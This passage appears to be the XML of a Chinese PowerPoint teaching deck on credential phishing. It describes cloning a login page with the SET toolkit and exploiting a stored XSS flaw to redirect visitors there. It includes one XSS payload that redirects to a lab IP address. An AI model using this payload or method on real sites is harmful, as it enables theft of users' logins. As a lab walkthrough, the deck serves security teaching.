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盗取用户信息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查看盗取账号和密码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1232535"/>
            <a:ext cx="8546465" cy="543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787265" cy="1489075"/>
            <a:chOff x="4298950" y="2274888"/>
            <a:chExt cx="47872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盗取用户信息原理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2030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setookit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工具克隆网站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715510" cy="1458912"/>
            <a:chOff x="4298950" y="4113213"/>
            <a:chExt cx="47155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313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跳转克隆网站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查看盗取账号和密码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787265" cy="1489075"/>
            <a:chOff x="4298950" y="2274888"/>
            <a:chExt cx="47872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盗取用户信息原理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2030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setookit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工具克隆网站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715510" cy="1458912"/>
            <a:chOff x="4298950" y="4113213"/>
            <a:chExt cx="47155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313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跳转克隆网站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查看盗取账号和密码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8930" y="3081655"/>
            <a:ext cx="391414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盗取用户信息原理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盗取用户信息原理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68973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克隆网站登陆页面，利用存储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设置跳转代码，如果用户访问即跳转到克隆网站的登陆页面，用户输入登陆，账号和密码被存储</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN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0220" y="3164205"/>
            <a:ext cx="1606550" cy="121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11770" y="3164205"/>
            <a:ext cx="1606550" cy="121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原始站点有存储</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>漏洞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19015" y="4792980"/>
            <a:ext cx="1606550" cy="121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克隆站点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432175" y="3736340"/>
            <a:ext cx="4445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05430" y="4407535"/>
            <a:ext cx="1830070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515735" y="4407535"/>
            <a:ext cx="1868170" cy="1078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12185" y="3163570"/>
            <a:ext cx="51676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setookit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工具克隆网站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2090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万能的社工工具。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95655" y="670560"/>
            <a:ext cx="249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setookit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工具克隆网站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145" y="1773555"/>
            <a:ext cx="8281035" cy="4457700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1577340"/>
            <a:ext cx="7639685" cy="5067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42716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跳转克隆网站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跳转克隆网站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658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xss payload: &lt;script&gt;window.location=”http://192.168.253.28/” &lt;/script&gt;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0" y="1933575"/>
            <a:ext cx="7031355" cy="4230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23995" y="3081020"/>
            <a:ext cx="41446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查看盗取账号和密码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盗取用户信息原理</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>setookit工具克隆网站</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>存储XSS跳转克隆网站</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>查看盗取账号和密码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81</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-08-20T13:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-10-23T04:48:51Z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